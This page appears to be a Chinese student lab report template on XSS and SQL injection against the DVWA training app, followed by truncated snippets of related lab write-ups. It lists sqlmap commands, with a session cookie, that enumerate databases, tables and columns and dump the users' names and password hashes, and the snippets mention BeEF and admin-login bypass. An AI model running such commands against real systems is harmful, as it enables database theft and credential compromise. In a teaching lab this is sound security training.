實驗三 XSS與SQL注入

2021-10-12 12:55:52 字數 2216 閱讀 5435

,>=,

單引號(「』」) 用於指示字串型資料 見select

逗號 分割相同的項 見select

5、回答問題:實驗中xss攻擊屬於哪種型別?

儲存型xss攻擊

下頁還有sql注入,請繼續!

sql注入部分:dvwa+sqlmap+mysql注入實戰

你輸入的命令:sqlmap -u"" --cookie=『security=low; phpsessid=5a3416ecee2635f46be8e82bde93e9dd』 -b --current-db --current-user

sqlmap輸出截圖。

3、列舉資料庫使用者名稱和密碼

你輸入的命令:sqlmap -u 「」 --cookie=『security=low; phpsessid=5a3416ecee2635f46be8e82bde93e9dd』 --string=「surname」 --users --password

sqlmap輸出截圖。

4、列舉資料庫

–dbs:列舉當前資料庫

你輸入的命令:sqlmap -u 「」 --cookie=『security=low; phpsessid=5a3416ecee2635f46be8e82bde93e9dd』 --string=「surname」 -dbs

sqlmap輸出截圖。

5、列舉資料庫和指定資料庫的資料表

-d 資料庫名:指定資料庫

–tables:列舉指定資料庫的所有表

你輸入的命令:sqlmap -u 「」 --cookie=『security=low; phpsessid=5a3416ecee2635f46be8e82bde93e9dd』 --string=「surname」 -d dvwa --tables

sqlmap輸出截圖。

6、獲取指定資料庫和表中所有列的資訊

-d:指定的資料庫

-t:指定資料庫中的資料表

–columns:獲取列的資訊

你輸入的命令:sqlmap -u 「」 --cookie=『security=low; phpsessid=5a3416ecee2635f46be8e82bde93e9dd』 --string=「surname」 -d dvwa -t users --columns

sqlmap輸出截圖。

7、列舉指定資料表中的所有使用者名稱與密碼,並down到本地。

-c:列舉資料表中的列

–dump:儲存資料表項

你輸入的命令:sqlmap -u 「」 --cookie=『security=low; phpsessid=5a3416ecee2635f46be8e82bde93e9dd』 --string=「surname」 -d dvwa -t users -c user,password --dump

sqlmap輸出截圖。

檢視down到本地的使用者名稱與密碼,截圖。(提示帶.的資料夾為隱藏,在圖形命令下,用檔案瀏覽器開啟資料夾,按下ctrl+h組合鍵可顯示隱藏檔案合資料夾,再按一次取消顯示。)

XSS與SQL注入

2 kali使用beef生成惡意 在這裡使用beef工具時出現了錯誤,不能使用預設的賬號和密碼,檔案中新增乙個賬號即可 二 sql注入實驗 實驗環境 實驗裝置 一台kali虛擬機器,一台metasploitable2虛擬機器 均採用橋接方式 在kali中訪問metasploitable2的dvwa,...

Sql注入實驗 三

對於繞過後台登入的實驗,我們通過前面的注入已經拿到了md5 解密就可以去登入後台了,但是我們並不滿求這乙個方法,難道就不能直接登入?得到後台登入位址 後台看不出什麼通過分析 和嘗試輸入 登入 報錯 那麼報錯會證明什麼了 那麼登入語句一定是這樣的 select name.passwd from use...

XSS和SQL注入

單引號 用於指示字串型資料 見select 逗號 分割相同的項 見select 2 kali使用beef生成惡意 5 回答問題 實驗中xss攻擊屬於哪種型別?反射型xss 實驗環境搭建。啟動metasploitable2虛擬機器。1 注入點發現。首先肯定是要判斷是否有注入漏洞。在輸入框輸入1,返回 ...